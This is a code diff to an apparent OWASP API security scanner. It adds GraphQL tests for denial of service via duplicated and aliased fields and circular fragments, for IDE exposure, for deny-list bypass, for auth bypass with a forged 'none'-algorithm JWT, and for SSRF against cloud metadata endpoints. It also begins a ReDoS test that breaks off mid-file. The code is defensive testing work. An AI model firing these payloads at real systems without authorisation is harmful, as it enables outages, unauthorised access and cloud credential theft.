+            "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0" +
+            ".eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIiwicm9sZSI6ImFkbWluIn0" +
+            ".";
+
     // Standard introspection query — smallest form that reveals the full schema
     private static final String INTROSPECTION_QUERY =
             "{\"query\":\"{__schema{queryType{name}mutationType{name}types{name kind}}}\"}";
@@ -88,11 +119,35 @@ public class GraphQLSecurityTestCase implements TestCase {
     private static final String BATCH_QUERY =
             "[{\"query\":\"{__typename}\"},{\"query\":\"{__typename}\"},{\"query\":\"{__typename}\"}]";
 
+    // A moderately expensive, always-valid selection (real schema-walking work, not a free
+    // meta-field like __typename) used as the repeated unit for the field-duplication and
+    // alias-based DoS probes below — chosen because it works on any schema without knowing the
+    // target's own (potentially actually expensive) resolvers.
+    private static final String DOS_PROBE_SELECTION = "__schema{types{name kind fields{name}}}";
+    private static final int DOS_REPETITION_COUNT = 60;
+
+    private static final long DOS_ABSOLUTE_SLOW_THRESHOLD_MS = 3000;
+    private static final long DOS_BASELINE_MULTIPLIER = 8;
+
+    // Two fragments that reference each other — a cycle the GraphQL spec requires servers to
+    // reject at validation time (before execution). A server that doesn't check for this can
+    // recurse indefinitely trying to resolve the cycle.
+    private static final String CIRCULAR_FRAGMENT_QUERY =
+            "{\"query\":\"fragment A on Query{...B} fragment B on Query{...A} query{...A}\"}";
+
     // Introspects mutation fields, their argument types/names, AND their own return type, so
     // injection payloads can be sent to real mutations discovered from the schema (rather than
     // guessed field names) with a request shape the resolver will actually accept.
     private static final String MUTATION_INTROSPECTION_QUERY =
             "{\"query\":\"{__schema{mutationType{fields{name " +
+            "type{name kind ofType{name kind ofType{name kind}}} " +
+            "args{name type{name kind ofType{name kind ofType{name kind}}}}}}}}\"}";
+
+    // Same shape as MUTATION_INTROSPECTION_QUERY but for queryType — resolver-level injection
+    // isn't unique to mutations; a query field with a string argument (e.g. DVGA's pastes(filter))
+    // can just as easily concatenate it into a SQL query or shell command.
+    private static final String QUERY_INTROSPECTION_QUERY =
+            "{\"query\":\"{__schema{queryType{fields{name " +
             "type{name kind ofType{name kind ofType{name kind}}} " +
             "args{name type{name kind ofType{name kind ofType{name kind}}}}}}}}\"}";
 
@@ -118,6 +173,22 @@ public class GraphQLSecurityTestCase implements TestCase {
 
     private static final List<String> RESOLVER_INJECTION_INDICATORS = List.of(
             "<script>alert('xss')</script>", "root:x:0:0", "sql syntax", "syntax error near"
+    );
+
+    // Argument names suggesting the value is used to make an outbound request — the same GraphQL
+    // mutation/query-argument surface as resolver injection, but tested with SSRF payloads
+    // instead when the argument name looks URL/host-shaped (e.g. DVGA's importPaste(host, path)).
+    private static final List<String> SSRF_LIKE_ARG_NAMES = List.of(
+            "url", "uri", "host", "link", "callback", "webhook", "endpoint", "target", "path", "src"
+    );
+
+    private static final List<String> GRAPHQL_SSRF_PAYLOADS = List.of(
+            "http://169.254.169.254/latest/meta-data/",
+            "http://metadata.google.internal/computeMetadata/v1/"
+    );
+
+    private static final List<String> GRAPHQL_SSRF_INDICATORS = List.of(
+            "ami-id", "instance-id", "iam/security-credentials", "computemetadata", "instance/service-accounts"
     );
 
     private static final String CONTENT_TYPE_JSON = "application/json";
@@ -161,6 +232,12 @@ public class GraphQLSecurityTestCase implements TestCase {
         findings.addAll(testQueryDepthAttack(endpoint, httpClient));
         findings.addAll(testBatchQueryAbuse(endpoint, httpClient));
         findings.addAll(testResolverInjection(endpoint, httpClient));
+        findings.addAll(testFieldDuplicationAttack(endpoint, httpClient));
+        findings.addAll(testAliasBasedAttack(endpoint, httpClient));
+        findings.addAll(testCircularFragmentAttack(endpoint, httpClient));
+        findings.addAll(testGraphiQLExposure(endpoint, httpClient));
+        findings.addAll(testOperationDenyListBypass(endpoint, httpClient));
+        findings.addAll(testArgumentBasedAuthBypass(endpoint, httpClient));
 
         return findings;
     }
@@ -386,6 +463,388 @@ public class GraphQLSecurityTestCase implements TestCase {
         return findings;
     }
 
+    // ── Test: field duplication / alias-based / circular-fragment DoS ────────
+
+    /**
+     * Repeats an identical, moderately expensive selection {@link #DOS_REPETITION_COUNT} times
+     * within a single query and compares its response time against a single-copy baseline. A
+     * server without duplicate-selection protection may re-execute the underlying resolver once
+     * per repetition rather than merging them, making response time scale with repetition count.
+     */
+    List<Finding> testFieldDuplicationAttack(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            String baselineQuery = "{\"query\":\"{" + DOS_PROBE_SELECTION + "}\"}";
+            long baselineStart = System.currentTimeMillis();
+            HttpResponse baseline = httpClient.postWithStatus(
+                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, baselineQuery);
+            long baselineElapsed = System.currentTimeMillis() - baselineStart;
+            if (!isAcceptedGraphQLQuery(baseline)) {
+                return findings;
+            }
+
+            StringBuilder repeated = new StringBuilder("{\"query\":\"{");
+            for (int i = 0; i < DOS_REPETITION_COUNT; i++) {
+                repeated.append(DOS_PROBE_SELECTION).append(" ");
+            }
+            repeated.append("}\"}");
+
+            boolean timedOut = false;
+            long start = System.currentTimeMillis();
+            try {
+                httpClient.postWithStatus(endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, repeated.toString());
+            } catch (IOException e) {
+                timedOut = true;
+            }
+            long elapsed = System.currentTimeMillis() - start;
+            long threshold = Math.max(DOS_ABSOLUTE_SLOW_THRESHOLD_MS, baselineElapsed * DOS_BASELINE_MULTIPLIER);
+
+            if (timedOut || elapsed > threshold) {
+                Finding f = new Finding(
+                        UUID.randomUUID().toString(),
+                        "GraphQL Field Duplication Denial of Service",
+                        String.format("Repeating the same selection %d times in a single query took %s " +
+                                "versus a %dms single-copy baseline, indicating the server re-executes the " +
+                                "underlying resolver once per repetition instead of de-duplicating identical " +
+                                "selections before execution.",
+                                DOS_REPETITION_COUNT, timedOut ? "longer than the connection timeout" : elapsed + "ms",
+                                baselineElapsed),
+                        Severity.MEDIUM,
+                        getId(),
+                        "POST " + endpoint.getPath(),
+                        "Impose a maximum query cost/complexity limit (counting repeated selections), or " +
+                        "de-duplicate identical field selections before execution."
+                );
+                f.setEvidence(timedOut
+                        ? "Request timed out (baseline: " + baselineElapsed + "ms)"
+                        : "Response took " + elapsed + "ms for " + DOS_REPETITION_COUNT +
+                          " repetitions (baseline: " + baselineElapsed + "ms)");
+                findings.add(f);
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing GraphQL field duplication on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
+    /**
+     * Same technique as {@link #testFieldDuplicationAttack}, but each repetition is given a
+     * unique alias — bypassing any protection that only de-duplicates identical (non-aliased)
+     * field selections, since aliased selections are never considered "the same field" for
+     * merging purposes even when they're otherwise identical.
+     */
+    List<Finding> testAliasBasedAttack(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            String baselineQuery = "{\"query\":\"{a0:" + DOS_PROBE_SELECTION + "}\"}";
+            long baselineStart = System.currentTimeMillis();
+            HttpResponse baseline = httpClient.postWithStatus(
+                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, baselineQuery);
+            long baselineElapsed = System.currentTimeMillis() - baselineStart;
+            if (!isAcceptedGraphQLQuery(baseline)) {
+                return findings;
+            }
+
+            StringBuilder aliased = new StringBuilder("{\"query\":\"{");
+            for (int i = 0; i < DOS_REPETITION_COUNT; i++) {
+                aliased.append("a").append(i).append(":").append(DOS_PROBE_SELECTION).append(" ");
+            }
+            aliased.append("}\"}");
+
+            boolean timedOut = false;
+            long start = System.currentTimeMillis();
+            try {
+                httpClient.postWithStatus(endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, aliased.toString());
+            } catch (IOException e) {
+                timedOut = true;
+            }
+            long elapsed = System.currentTimeMillis() - start;
+            long threshold = Math.max(DOS_ABSOLUTE_SLOW_THRESHOLD_MS, baselineElapsed * DOS_BASELINE_MULTIPLIER);
+
+            if (timedOut || elapsed > threshold) {
+                Finding f = new Finding(
+                        UUID.randomUUID().toString(),
+                        "GraphQL Alias-Based Denial of Service",
+                        String.format("Requesting the same expensive selection %d times under distinct " +
+                                "aliases in a single query took %s versus a %dms single-alias baseline. " +
+                                "Aliases bypass duplicate-field detection that only matches identical, " +
+                                "non-aliased selections, letting an attacker multiply resolver load far " +
+                                "beyond what query-depth limiting alone would catch.",
+                                DOS_REPETITION_COUNT, timedOut ? "longer than the connection timeout" : elapsed + "ms",
+                                baselineElapsed),
+                        Severity.MEDIUM,
+                        getId(),
+                        "POST " + endpoint.getPath(),
+                        "Impose a query cost/complexity limit that counts every aliased selection " +
+                        "individually, not just unique field names."
+                );
+                f.setEvidence(timedOut
+                        ? "Request timed out (baseline: " + baselineElapsed + "ms)"
+                        : "Response took " + elapsed + "ms for " + DOS_REPETITION_COUNT +
+                          " aliased repetitions (baseline: " + baselineElapsed + "ms)");
+                findings.add(f);
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing GraphQL alias-based attack on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
+    /**
+     * Sends two fragments that reference each other in a cycle. The GraphQL specification
+     * requires servers to detect and reject fragment cycles at validation time, before
+     * execution — a server that instead tries to resolve the cycle can hang or crash.
+     */
+    List<Finding> testCircularFragmentAttack(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            boolean timedOut = false;
+            long start = System.currentTimeMillis();
+            HttpResponse response = null;
+            try {
+                response = httpClient.postWithStatus(
+                        endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, CIRCULAR_FRAGMENT_QUERY);
+            } catch (IOException e) {
+                timedOut = true;
+            }
+            long elapsed = System.currentTimeMillis() - start;
+
+            if (timedOut || elapsed > DOS_ABSOLUTE_SLOW_THRESHOLD_MS) {
+                Finding f = new Finding(
+                        UUID.randomUUID().toString(),
+                        "GraphQL Circular Fragment Denial of Service",
+                        String.format("Two mutually-referencing fragments — a cycle the GraphQL spec requires " +
+                                "servers to reject at validation time — caused the response to take %s. " +
+                                "A spec-compliant server rejects this instantly with a validation error; " +
+                                "this server instead appears to attempt resolving the cycle.",
+                                timedOut ? "longer than the connection timeout" : elapsed + "ms"),
+                        Severity.HIGH,
+                        getId(),
+                        "POST " + endpoint.getPath(),
+                        "Ensure the GraphQL server library's fragment-cycle validation is enabled (it's " +
+                        "part of the GraphQL specification and enabled by default in virtually every " +
+                        "compliant implementation — verify no custom validation rules have disabled it)."
+                );
+                f.setEvidence(timedOut ? "Request timed out" : "Response took " + elapsed + "ms");
+                findings.add(f);
+            } else if (response != null) {
+                logger.debug("GraphQL server correctly rejected the circular fragment query on {} (HTTP {})",
+                        endpoint, response.getStatusCode());
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing GraphQL circular fragment attack on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
+    // ── Test: GraphQL IDE exposure (with cookie-gated bypass check) ───────────
+
+    /**
+     * Probes for exposed GraphQL IDE/explorer interfaces (GraphiQL, Playground, Altair, Voyager),
+     * which are development tools that should never be reachable in production — they expose a
+     * live, schema-aware query console to anyone who finds the path. If unauthenticated access is
+     * blocked, retries with a guessed "debug"/"admin" cookie: some targets gate the IDE behind a
+     * client-controllable cookie rather than real authentication, and a request that succeeds only
+     * with that cookie present is itself evidence of that weak gate.
+     */
+    List<Finding> testGraphiQLExposure(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        String baseUrl = endpoint.getBaseUrl() != null ? endpoint.getBaseUrl() : "";
+
+        for (String path : GRAPHQL_IDE_PATHS) {
+            try {
+                String url = baseUrl + path;
+                HttpResponse response = httpClient.getWithStatus(url, Map.of());
+
+                if (response != null && response.isSuccess() && looksLikeGraphQLIde(response.getBody())) {
+                    Finding f = new Finding(
+                            UUID.randomUUID().toString(),
+                            "GraphQL IDE Exposed in Production",
+                            String.format("A GraphQL IDE/explorer interface is publicly accessible at '%s'. " +
+                                    "These developer tools expose the full schema and a live query console " +
+                                    "to anyone who finds the path, and should never be reachable outside " +
+                                    "development environments.", path),
+                            Severity.MEDIUM,
+                            getId(),
+                            "GET " + path,
+                            "Disable the GraphQL IDE/playground in production builds, or restrict it to " +
+                            "internal networks / behind real authentication."
+                    );
+                    f.setEvidence("GET " + url + " returned HTTP " + response.getStatusCode() + " with IDE markup");
+                    findings.add(f);
+                    continue;
+                }
+
+                if (response != null && !response.isSuccess()) {
+                    HttpResponse withCookie = httpClient.getWithStatus(url, DEBUG_COOKIE_HEADERS);
+                    if (withCookie != null && withCookie.isSuccess() && looksLikeGraphQLIde(withCookie.getBody())) {
+                        Finding f = new Finding(
+                                UUID.randomUUID().toString(),
+                                "GraphQL IDE Access Gated by a Guessable Cookie",
+                                String.format("The GraphQL IDE at '%s' is blocked without any cookie, but " +
+                                        "became accessible after sending a guessed 'debug=true; isAdmin=true' " +
+                                        "cookie. Client-controllable cookies are not an access-control " +
+                                        "mechanism — any client can set them.", path),
+                                Severity.HIGH,
+                                getId(),
+                                "GET " + path,
+                                "Never gate access to internal tools behind a client-supplied cookie value. " +
+                                "Disable the IDE in production entirely, or require real server-side session " +
+                                "authentication."
+                        );
+                        f.setEvidence("GET " + url + " without cookie: HTTP " + response.getStatusCode() +
+                                "; with debug cookie: HTTP " + withCookie.getStatusCode());
+                        findings.add(f);
+                    }
+                }
+            } catch (Exception e) {
+                logger.debug("Error probing GraphQL IDE path {} on {}: {}", path, endpoint, e.getMessage());
+            }
+        }
+
+        return findings;
+    }
+
+    private boolean looksLikeGraphQLIde(String body) {
+        if (body == null) return false;
+        String lower = body.toLowerCase();
+        return lower.contains("graphiql") || lower.contains("graphql-playground")
+                || lower.contains("altair") || lower.contains("voyager");
+    }
+
+    // ── Test: operation deny-list bypass via fragment wrapping ────────────────
+
+    /**
+     * Tests whether a naive, string-matching deny-list (checking the raw query text for a
+     * blocked field name, rather than parsing the AST) can be bypassed by referencing the same
+     * field only through a fragment spread. Picks the first schema field whose name suggests
+     * it's sensitive enough to plausibly be deny-listed, calls it directly, then calls the exact
+     * same field wrapped in a fragment — if the direct call is rejected but the fragment-wrapped
+     * one succeeds, that's concrete evidence of a text-based (rather than AST-based) filter.
+     */
+    List<Finding> testOperationDenyListBypass(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            HttpResponse introspectionResponse = httpClient.postWithStatus(
+                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, QUERY_INTROSPECTION_QUERY);
+            if (!isAcceptedGraphQLQuery(introspectionResponse)) {
+                return findings;
+            }
+
+            JsonNode root = objectMapper.readTree(introspectionResponse.getBody());
+            JsonNode fields = root.path("data").path("__schema").path("queryType").path("fields");
+            if (!fields.isArray()) {
+                return findings;
+            }
+
+            String sensitiveFieldName = null;
+            for (JsonNode field : fields) {
+                String name = field.path("name").asText(null);
+                if (name == null) continue;
+                String lowerName = name.toLowerCase();
+                if (SENSITIVE_FIELD_KEYWORDS.stream().anyMatch(lowerName::contains)) {
+                    sensitiveFieldName = name;
+                    break;
+                }
+            }
+            if (sensitiveFieldName == null) {
+                return findings;
+            }
+
+            String directQuery = "{\"query\":\"{" + sensitiveFieldName + "{__typename}}\"}";
+            HttpResponse directResponse = httpClient.postWithStatus(
+                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, directQuery);
+
+            boolean directBlocked = directResponse == null
+                    || !directResponse.isSuccess()
+                    || (directResponse.getBody() != null && directResponse.getBody().toLowerCase().contains("error"));
+            if (!directBlocked) {
+                return findings; // not blocked directly — nothing to bypass
+            }
+
+            String fragmentField = sensitiveFieldName;
+            String fragmentQuery = String.format(
+                    "{\"query\":\"fragment F on Query{%s{__typename}} query{...F}\"}", fragmentField);
+            HttpResponse fragmentResponse = httpClient.postWithStatus(
+                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, fragmentQuery);
+
+            if (isAcceptedGraphQLQuery(fragmentResponse)) {
+                Finding f = new Finding(
+                        UUID.randomUUID().toString(),
+                        "GraphQL Deny-List Bypass via Fragment Wrapping",
+                        String.format("The field '%s' is rejected when called directly, but succeeds when " +
+                                "referenced only through a fragment spread ('...FragmentName'). This " +
+                                "indicates the block is a text-based filter checking for the field name in " +
+                                "the raw query string, rather than proper AST-based validation.",
+                                sensitiveFieldName),
+                        Severity.HIGH,
+                        getId(),
+                        "POST " + endpoint.getPath(),
+                        "Enforce field-level access control in the resolver layer or via AST-based query " +
+                        "validation, not by string-matching the raw query text — fragments, aliases, and " +
+                        "whitespace variations all defeat text-based filters."
+                );
+                f.setEvidence("Direct call to " + sensitiveFieldName + " blocked; fragment-wrapped call succeeded");
+                findings.add(f);
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing GraphQL deny-list bypass on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
+    // ── Test: argument-based authentication bypass ────────────────────────────
+
+    /**
+     * Tests whether authentication can be bypassed by passing a forged JWT as a query
+     * ARGUMENT — e.g. {@code me(token: "...")} — rather than (or in addition to) the standard
+     * Authorization header. Some GraphQL APIs accept a token argument on user-lookup fields as a
+     * convenience and end up trusting it the same way as the header, without validating its
+     * signature — the same "none" algorithm forgery {@code BrokenAuthenticationTestCase} uses for
+     * the header-based variant, applied here as a query argument instead.
+     */
+    List<Finding> testArgumentBasedAuthBypass(EndpointInfo endpoint, HttpClient httpClient) {
+        List<Finding> findings = new ArrayList<>();
+        try {
+            HttpResponse baseline = httpClient.postWithStatus(endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON,
+                    "{\"query\":\"{__typename}\"}");
+            if (!isAcceptedGraphQLQuery(baseline)) {
+                return findings; // can't even do introspection-free queries — skip
+            }
+
+            for (String fieldName : CURRENT_USER_FIELD_NAMES) {
+                String query = String.format(
+                        "{\"query\":\"{%s(token:\\\"%s\\\"){__typename}}\"}", fieldName, NONE_ALG_JWT_ARG);
+                HttpResponse response = httpClient.postWithStatus(
+                        endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, query);
+
+                if (isAcceptedGraphQLQuery(response)) {
+                    Finding f = new Finding(
+                            UUID.randomUUID().toString(),
+                            "GraphQL Argument-Based Authentication Bypass",
+                            String.format("The query field '%s' accepted a 'token' argument containing a " +
+                                    "JWT signed with the 'none' algorithm and returned a successful response, " +
+                                    "indicating the token argument is trusted without signature validation.",
+                                    fieldName),
+                            Severity.CRITICAL,
+                            getId(),
+                            "POST " + endpoint.getPath() + " (query " + fieldName + ")",
+                            "Never accept authentication tokens as query arguments — use the Authorization " +
+                            "header exclusively, and always validate JWT signatures against a known algorithm " +
+                            "and key before trusting any claim in the token."
+                    );
+                    f.setEvidence("query{" + fieldName + "(token: <none-alg JWT>){__typename}} returned HTTP " +
+                            response.getStatusCode());
+                    findings.add(f);
+                    return findings; // one confirmed instance is enough
+                }
+            }
+        } catch (Exception e) {
+            logger.debug("Error testing GraphQL argument-based auth bypass on {}: {}", endpoint, e.getMessage());
+        }
+        return findings;
+    }
+
     // ── Test 5: Resolver-level injection ─────────────────────────────────────
 
     /**
@@ -412,32 +871,62 @@ public class GraphQLSecurityTestCase implements TestCase {
      */
     List<Finding> testResolverInjection(EndpointInfo endpoint, HttpClient httpClient) {
         List<Finding> findings = new ArrayList<>();
+        // Resolver-level injection isn't unique to mutations — a query field with a string
+        // argument (e.g. DVGA's pastes(filter)) is just as exploitable, and testing only
+        // mutations (the original scope) missed that whole surface.
+        findings.addAll(testFieldInjection(endpoint, httpClient, MUTATION_INTROSPECTION_QUERY, "mutationType", "mutation"));
+        findings.addAll(testFieldInjection(endpoint, httpClient, QUERY_INTROSPECTION_QUERY, "queryType", "query"));
+        return findings;
+    }
+
+    /**
+     * Shared implementation behind {@link #testResolverInjection}, parameterized over whether
+     * it's testing {@code mutationType} or {@code queryType} fields.
+     * <p>
+     * Tests every discovered candidate field (bounded to 5, see {@link #extractStringArgFields}),
+     * not just the first one that yields a finding — a mutation being vulnerable doesn't mean
+     * every other mutation is safe, and stopping at the first confirmed hit (the original
+     * behavior) silently skipped every other candidate in the same scan.
+     */
+    private List<Finding> testFieldInjection(EndpointInfo endpoint, HttpClient httpClient,
+                                              String introspectionQuery, String schemaFieldName,
+                                              String operationKeyword) {
+        List<Finding> findings = new ArrayList<>();
 
         List<MutationCandidate> candidates;
         try {
             HttpResponse introspectionResponse = httpClient.postWithStatus(
-                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, MUTATION_INTROSPECTION_QUERY);
+                    endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, introspectionQuery);
 
             if (!isAcceptedGraphQLQuery(introspectionResponse)) {
-                logger.debug("Skipping resolver injection test — mutation introspection unavailable on {}", endpoint);
+                logger.debug("Skipping {} injection test — {} introspection unavailable on {}",
+                        operationKeyword, schemaFieldName, endpoint);
                 return findings;
             }
-            candidates = extractStringArgMutations(introspectionResponse.getBody());
+            candidates = extractStringArgFields(introspectionResponse.getBody(), schemaFieldName);
         } catch (Exception e) {
-            logger.debug("Error introspecting mutations on {}: {}", endpoint, e.getMessage());
+            logger.debug("Error introspecting {} on {}: {}", schemaFieldName, endpoint, e.getMessage());
             return findings;
         }
 
         for (MutationCandidate candidate : candidates) {
             String selectionSet = resolveSelectionSet(candidate.returnTypeName(), endpoint, httpClient, 0);
+            boolean isSsrfLikeArg = SSRF_LIKE_ARG_NAMES.stream()
+                    .anyMatch(name -> candidate.targetArgName().toLowerCase().contains(name));
 
-            for (String payload : RESOLVER_INJECTION_PAYLOADS) {
+            List<String> payloadsToTry = new ArrayList<>(RESOLVER_INJECTION_PAYLOADS);
+            if (isSsrfLikeArg) {
+                payloadsToTry.addAll(GRAPHQL_SSRF_PAYLOADS);
+            }
+
+            boolean confirmedForThisCandidate = false;
+            for (String payload : payloadsToTry) {
                 try {
                     String escapedPayload = payload.replace("\\", "\\\\").replace("\"", "\\\"");
                     String argList = buildArgumentList(candidate, escapedPayload);
-                    String mutation = String.format("mutation{%s(%s)%s}",
-                            candidate.name(), argList, selectionSet);
-                    String requestBody = "{\"query\":\"" + mutation + "\"}";
+                    String fieldCall = String.format("%s{%s(%s)%s}",
+                            operationKeyword, candidate.name(), argList, selectionSet);
+                    String requestBody = "{\"query\":\"" + fieldCall + "\"}";
 
                     HttpResponse response = httpClient.postWithStatus(
                             endpoint.getFullUrl(), Map.of(), CONTENT_TYPE_JSON, requestBody);
@@ -445,38 +934,66 @@ public class GraphQLSecurityTestCase implements TestCase {
 
                     if (response != null && response.isSuccess() && body != null) {
                         String lowerBody = body.toLowerCase();
-                        for (String indicator : RESOLVER_INJECTION_INDICATORS) {
+                        boolean isSsrfPayload = GRAPHQL_SSRF_PAYLOADS.contains(payload);
+                        List<String> indicatorsToCheck = isSsrfPayload
+                                ? GRAPHQL_SSRF_INDICATORS : RESOLVER_INJECTION_INDICATORS;
+
+                        for (String indicator : indicatorsToCheck) {
                             if (lowerBody.contains(indicator.toLowerCase())) {
-                                Finding f = new Finding(
-                                        UUID.randomUUID().toString(),
-                                        "GraphQL Resolver Injection Vulnerability",
-                                        String.format("The mutation '%s' appears to pass its '%s' argument " +
-                                                "unsanitized into a resolver that executes it (SQL query, " +
-                                                "shell command, or renders it unescaped), based on the " +
-                                                "detected pattern '%s' in the response.",
-                                                candidate.name(), candidate.targetArgName(), indicator),
-                                        Severity.CRITICAL,
-                                        getId(),
-                                        "POST " + endpoint.getPath() + " (mutation " + candidate.name() + ")",
-                                        "Never build SQL queries or shell commands by concatenating resolver " +
-                                        "arguments. Use parameterized queries for database access, avoid " +
-                                        "shelling out entirely where possible, and escape/validate all " +
-                                        "resolver input before use, output, or persistence."
-                                );
-                                f.setEvidence("Payload: " + payload + "\nPattern found: " + indicator);
-                                findings.add(f);
-                                return findings; // One confirmed resolver injection is enough
+                                findings.add(buildResolverInjectionFinding(endpoint, candidate, operationKeyword,
+                                        payload, indicator, isSsrfPayload));
+                                confirmedForThisCandidate = true;
+                                break;
                             }
                         }
                     }
                 } catch (Exception e) {
-                    logger.debug("Error testing resolver injection on mutation {}.{}: {}",
-                            candidate.name(), candidate.targetArgName(), e.getMessage());
+                    logger.debug("Error testing {} injection on {}.{}: {}",
+                            operationKeyword, candidate.name(), candidate.targetArgName(), e.getMessage());
+                }
+
+                // One confirmed finding for THIS field is enough — but unlike the original
+                // behavior, this only stops trying payloads against the current candidate; the
+                // outer loop still moves on to test every other candidate field.
+                if (confirmedForThisCandidate) {
+                    break;
                 }
             }
         }
 
         return findings;
+    }
+
+    private Finding buildResolverInjectionFinding(EndpointInfo endpoint, MutationCandidate candidate,
+                                                   String operationKeyword, String payload, String indicator,
+                                                   boolean isSsrf) {
+        Finding f = new Finding(
+                UUID.randomUUID().toString(),
+                isSsrf ? "GraphQL Resolver SSRF Vulnerability" : "GraphQL Resolver Injection Vulnerability",
+                isSsrf
+                        ? String.format("The %s '%s' appears to pass its '%s' argument to a server-side " +
+                                "HTTP request without validating the destination — a cloud metadata endpoint " +
+                                "URL placed in this argument was fetched and its response reflected back, " +
+                                "based on the detected pattern '%s'.",
+                                operationKeyword, candidate.name(), candidate.targetArgName(), indicator)
+                        : String.format("The %s '%s' appears to pass its '%s' argument unsanitized into a " +
+                                "resolver that executes it (SQL query, shell command, or renders it " +
+                                "unescaped), based on the detected pattern '%s' in the response.",
+                                operationKeyword, candidate.name(), candidate.targetArgName(), indicator),
+                Severity.CRITICAL,
+                getId(),
+                "POST " + endpoint.getPath() + " (" + operationKeyword + " " + candidate.name() + ")",
+                isSsrf
+                        ? "Validate and allowlist destination hosts before making any server-side request " +
+                          "built from user input. Block requests to link-local/metadata IP ranges (e.g. " +
+                          "169.254.169.254) at the network layer as defense in depth."
+                        : "Never build SQL queries or shell commands by concatenating resolver arguments. " +
+                          "Use parameterized queries for database access, avoid shelling out entirely where " +
+                          "possible, and escape/validate all resolver input before use, output, or persistence."
+        );
+        f.setEvidence("Payload: " + payload + "\nPattern found: " + indicator);
+        f.setRequestDetails("mutation/query field: " + candidate.name());
+        return f;
     }
 
     private record ArgSpec(String name, String typeName) { }
@@ -485,17 +1002,17 @@ public class GraphQLSecurityTestCase implements TestCase {
                                       String returnTypeName) { }
 
     /**
-     * Parses the mutation-introspection response and returns, for each mutation field with at
+     * Parses a mutationType/queryType introspection response and returns, for each field with at
      * least one String-typed argument, its name, its first String argument (the injection
-     * target), every argument the mutation accepts (so all of them can be given a valid default —
-     * see {@link #testResolverInjection}), and its own resolved return type name. Bounded to the
-     * first 5 mutations found, to keep request volume reasonable.
+     * target), every argument the field accepts (so all of them can be given a valid default —
+     * see {@link #testFieldInjection}), and its own resolved return type name. Bounded to the
+     * first 5 fields found, to keep request volume reasonable.
      */
-    List<MutationCandidate> extractStringArgMutations(String introspectionBody) {
+    List<MutationCandidate> extractStringArgFields(String introspectionBody, String schemaFieldName) {
         List<MutationCandidate> results = new ArrayList<>();
         try {
             JsonNode root = objectMapper.readTree(introspectionBody);
-            JsonNode fields = root.path("data").path("__schema").path("mutationType").path("fields");
+            JsonNode fields = root.path("data").path("__schema").path(schemaFieldName).path("fields");
             if (!fields.isArray()) {
                 return results;
             }

--- a/src/main/java/org/owasp/astf/testcases/RegexDosTestCase.java
+++ b/src/main/java/org/owasp/astf/testcases/RegexDosTestCase.java
@@ -1,0 +1,194 @@
+package org.owasp.astf.testcases;
+
+import java.io.IOException;
+import java.util.ArrayList;
+import java.util.Iterator;
+import java.util.List;
+import java.util.Map;
+import java.util.UUID;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.owasp.astf.core.EndpointInfo;
+import org.owasp.astf.core.http.HttpClient;
+import org.owasp.astf.core.http.HttpResponse;
+import org.owasp.astf.core.result.Finding;
+import org.owasp.astf.core.result.Severity;
+
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+/**
+ * Tests REST endpoint body fields for ReDoS (Regular Expression Denial of Service) —
+ * catastrophic-backtracking input that causes a vulnerable validation regex to hang the server.
+ *
+ * <p>Found by tracing ASTF's actual findings against VAmPI's own documented vulnerability list:
+ * VAmPI documents a ReDoS vulnerability on its email-update endpoint, and no test case in this
+ * framework attempted it at all.</p>
+ *
+ * <p>Test case ID: {@code ASTF-REDOS-2023} — like injection, ReDoS doesn't map to a single
+ * numbered OWASP API Security Top 10 (2023) category, so this follows the same convention
+ * already used for GraphQL/gRPC/mTLS/LLM/Injection.</p>
+ */
+public class RegexDosTestCase implements TestCase {
+    private static final Logger logger = LogManager.getLogger(RegexDosTestCase.class);
+
+    // Fields most commonly validated with a (potentially vulnerable) format-checking regex.
+    private static final List<String> TARGET_FIELD_NAMES = List.of("email", "phone", "url", "username", "name");
+
+    // Generic catastrophic-backtracking triggers: a long run of a repeated character followed by
+    // one that can't match, designed to hit common vulnerable patterns with nested/overlapping
+    // quantifiers (e.g. (a+)+$, (a|a)+$, (a|aa)+$) without needing to know the target's exact
+    // regex. 35 repetitions is enough to make an O(2^n) blowup take seconds, not guessed at
+    // random — it's the same order of magnitude used in VAmPI's own documented ReDoS payload.
+    private static final List<String> REDOS_PAYLOADS = List.of(
+            "a".repeat(35) + "!",
+            "a".repeat(35) + "@",
+            "1".repeat(35) + "!"
+    );
+
+    private static final long ABSOLUTE_SLOW_THRESHOLD_MS = 4000;
+    private static final long BASELINE_MULTIPLIER = 8;
+
+    private final ObjectMapper objectMapper = new ObjectMapper();
+
+    @Override
+    public String getId() {
+        return "ASTF-REDOS-2023";
+    }
+
+    @Override
+    public String getName() {
